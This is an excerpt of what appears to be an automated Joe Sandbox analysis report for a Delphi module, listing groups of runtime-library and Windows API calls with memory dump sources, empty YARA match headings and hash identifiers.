                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C813
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C866
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C86B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C891
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C8AD
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C8B9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Copy$qqrx20Stringii$Asg$qqrr20EnsureLen$qqrx20String$qqrr20Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 878542493-0
                                                                                                  • Opcode ID: 3ab3b303093b8a636e88502fb4d09674c64ae5bfa68a04d5878e1d884443bb8e
                                                                                                  • Instruction ID: a5e6bedc7b1fa09ac2a89fd4f76479da9ae694add23f0eb23cd9a90cd4e19f31
                                                                                                  • Opcode Fuzzy Hash: 3ab3b303093b8a636e88502fb4d09674c64ae5bfa68a04d5878e1d884443bb8e
                                                                                                  • Instruction Fuzzy Hash: 76516E34A04185DBDF11DFA8DD82EADB3F9EF85220B6082A6D500D7295EBB0DEC5D781
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010450,?,?,?,?), ref: 500102B1
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500102CE
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 50010306
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 50010337
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 5001033C
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010392
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010397
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500103B4
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E6
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 5001041C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010421
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@$Unicode$AnsiExcept$qqrvException@$bctr$qqrp20FromRaiseRecpx14RecxiStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Internal$Asg$qqrr20Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2110080293-0
                                                                                                  APIs
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031275
                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 500312E9
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500312EE
                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 50031305
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 5003130A
                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 5003133E
                                                                                                  • @Variants@VarArrayCreateError$qqrv.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031349
                                                                                                  • @Variants@@VarClear$qqrr8TVarData.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031354
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 500313BB
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500313C0
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 500313D4
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(00000000,?,?,?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 500313D9
                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 50031409
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB), ref: 5003140E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Variants@$ArrayCheck$qqrlResult$Safe$BoundCreateIndex$Clear$qqrr8CopyDataError$qqrvVariantVariants@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2462754632-0
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                  • @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                  • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                  • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                  • @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                  • @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                  • LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                  • @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                  • @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                  • @Sysutils@StrLen$qqrpxb.RTL120(?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 5002645C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Sysutils@$ClassFileLen$qqrpxbModuleNameStringSystem@@$AnsiChar$qqrx20Class$qqrp14Copy$qqrpbpxbuiFindFmt$qqrpbuit1px14Instance$qqruiLoadMetaName$qqrvObject@Objectp17QueryRecxiResourceScan$qqrpbbUnicodeVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3883136372-0
                                                                                                  APIs
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000ADF2), ref: 5000AC77
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000ADF2), ref: 5000ACC4
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000ADF2), ref: 5000ACD0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000ADF2), ref: 5000ACED
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000000,5000ADF2), ref: 5000AD05
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120(?,?,00000000,5000ADF2), ref: 5000AD1D
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(?,?,00000000,5000ADF2), ref: 5000AD41
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,?,00000000,5000ADF2), ref: 5000AD69
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,?,?,00000000,5000ADF2), ref: 5000AD8D
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,00000000,?,?,00000000,5000ADF2), ref: 5000AD95
                                                                                                  • @System@UniqueString$qqrr27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000ADF2), ref: 5000ADA6
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000ADF2), ref: 5000ADC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@$Unicode$AnsiSystem@%$From$InternalT$us$i0$%$Str$qqrr27StringusT$us$i0$%x20$Str$qqrr20Stringx27$Char$qqrx20$Asg$qqrr20Char$qqrx27Length$qqrvString$qqrr27Stringx20Unique
                                                                                                  • String ID:
                                                                                                  • API String ID: 3676940474-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ECC4
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ECF1
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?,00000000,5001EDFA), ref: 5001ED1A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ED3C
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001EDFA), ref: 5001ED60
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EDFA), ref: 5001ED6A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ED87
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,00000000,5001EDFA), ref: 5001EDAB
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?,00000000,5001EDFA), ref: 5001EDB6
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EDFA), ref: 5001EDCC
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5001EDFA), ref: 5001EDDF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$From$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$FormatInternalSysutils@$Buf$qqrpbuipxvuipx14Length$qqrr20Recxirx24SettingsStringi$Asg$qqrr20CharChar$qqrx20Len$qqrr20StringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1571066770-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB2C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB59
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB7E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBA0
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBC4
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBCE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBEB
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC0B
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC16
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC2C
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$From$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Buf$qqrpbuipxvuipx14FormatLength$qqrr20RecxiStringiSysutils@$Asg$qqrr20CharChar$qqrx20Len$qqrr20StringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2011730137-0
                                                                                                  • Opcode ID: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                  • Instruction ID: 905ef9e5a7d310ec851db8a729e0b9c5fd371b18d59da8299c39f15f331ca2da
                                                                                                  • Opcode Fuzzy Hash: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                  • Instruction Fuzzy Hash: 03515C70A05199EFDB00DFA8DD8199EB7F9FF88200B6046A6E905E7355D730EE81DB90
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$From$AnsiStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Cat$qqrr20Cat3$qqrr20Char$qqrr20Copy$qqrx20DupeStr$qqriString$qqrx20StringbStringiStringiiStringt2Strutils@Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2114788560-0
                                                                                                  • Opcode ID: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                  • Instruction ID: 16ea5a0d39597b1b2e5b354b4af76d672fd4379d434ada6c456a148815a4d04d
                                                                                                  • Opcode Fuzzy Hash: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                  • Instruction Fuzzy Hash: DD514770A012998FDF00CFA9DD919AEB7F5FF49214B60466AE500E7395DB34EE81CB90
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010F1B), ref: 50010DFE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010F1B), ref: 50010E1B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010F1B), ref: 50010E53
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010F1B), ref: 50010E84
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010F1B), ref: 50010E89
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010F1B), ref: 50010EA6
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50010F1B), ref: 50010EB2
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50010F1B), ref: 50010EC0
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120(00000000,50010F1B), ref: 50010EC5
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,50010F1B), ref: 50010ED0
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120(00000000,50010F1B), ref: 50010EE5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
